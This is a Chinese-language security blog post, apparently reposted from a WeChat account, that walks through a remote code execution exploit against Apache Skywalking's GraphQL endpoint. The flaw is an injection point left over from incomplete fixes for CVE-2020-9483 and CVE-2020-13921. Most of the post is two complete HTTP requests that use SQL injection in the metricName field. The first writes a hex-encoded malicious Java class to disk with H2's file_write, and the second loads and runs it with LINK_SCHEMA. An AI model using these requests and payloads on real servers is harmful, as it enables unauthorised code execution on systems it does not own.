Skywalking - RCE

admin
admin
admin
146293
文章
119
评论
2021年5月15日07:41:27评论160 views字数 3737阅读12分27秒阅读模式


Skywalking - RCE


        Skywalking远程代码执行漏洞,为CVE-2020-9483、CVE-2020-13921修复不完善遗留注入点,可被进一步了利用执行代码。

漏洞地址: https://github.com/apache/skywalking/pull/6246/files

https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw

环境

Skywalking测试环境JDK1.8,恶意类为JDK1.7编译。

Skywalking - RCE


写入恶意类文件

将恶意类编译并转为十六进制数据,为file_write方法的第一个参数赋值,第二个参数为class文件名。

恶意类EvilClass.java 和 转十六进制工具代码ToHexTools.java 均在项目中。

执行 ToHexTools.java 会将 EvilClass.class 文件内容转码为十六进制形式,输出为 file.hex 文件。

Skywalking - RCE


POST /graphql HTTP/1.1Host: 192.168.18.240:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 2152Origin: http://192.168.18.240:8080Connection: closeReferer: http://192.168.18.240:8080/log
{     "query": "query queryLogs($condition: LogQueryCondition) {        logs: queryLogs(condition: $condition) {            data: logs {                serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content            }            total        }    }",    "variables": {        "condition": {            "metricName": "INFORMATION_SCHEMA.USERS union  all select file_write('cafebabe0000003100280a000800190a001a001b08001c0a001a001d07001e0a0005001f0700200700210100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c650100047468697301000b4c4576696c436c6173733b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b2956010004617267730100135b4c6a6176612f6c616e672f537472696e673b0100083c636c696e69743e010001650100154c6a6176612f696f2f494f457863657074696f6e3b01000a536f7572636546696c6501000e4576696c436c6173732e6a6176610c0009000a0700220c0023002401000463616c630c002500260100136a6176612f696f2f494f457863657074696f6e0c0027000a0100094576696c436c6173730100106a6176612f6c616e672f4f626a6563740100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b01000f7072696e74537461636b547261636500210007000800000000000300010009000a0001000b0000002f00010001000000052ab70001b100000002000c00000006000100000005000d0000000c000100000005000e000f00000009001000110001000b0000002b0000000100000001b100000002000c00000006000100000010000d0000000c00010000000100120013000000080014000a0001000b000000540002000100000012b800021203b6000457a700084b2ab60006b1000100000009000c00050002000c000000160005000000080009000b000c0009000d000a0011000c000d0000000c0001000d000400150016000000010017000000020018','EvilClass.class'))a where 1=? or 1=? or 1=? --",            "endpointId":"1",             "traceId":"1",             "state":"ALL",             "stateCode":"1",             "paging":{              "pageNum": 1,              "pageSize": 1,              "needTotal": true           }        }    }}


成功写入EvilClass.class文件。


Skywalking - RCE


加载执行恶意类

LINK_SCHEMA 的第二个参数值为要加载的文件名。

POST /graphql HTTP/1.1Host: 192.168.18.240:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/json;charset=utf-8Content-Length: 791Origin: http://192.168.18.240:8080Connection: closeReferer: http://192.168.18.240:8080/log
{     "query": "query queryLogs($condition: LogQueryCondition) {        logs: queryLogs(condition: $condition) {            data: logs {                serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content            }            total        }    }",    "variables": {        "condition": {            "metricName": "INFORMATION_SCHEMA.USERS union  all select LINK_SCHEMA('TEST2','EvilClass','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --",            "endpointId":"1",             "traceId":"1",             "state":"ALL",             "stateCode":"1",             "paging":{              "pageNum": 1,              "pageSize": 1,              "needTotal": true           }        }    }}



Skywalking - RCE


本文始发于微信公众号(Khan安全团队):Skywalking - RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年5月15日07:41:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Skywalking - RCEhttps://cn-sec.com/archives/272020.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息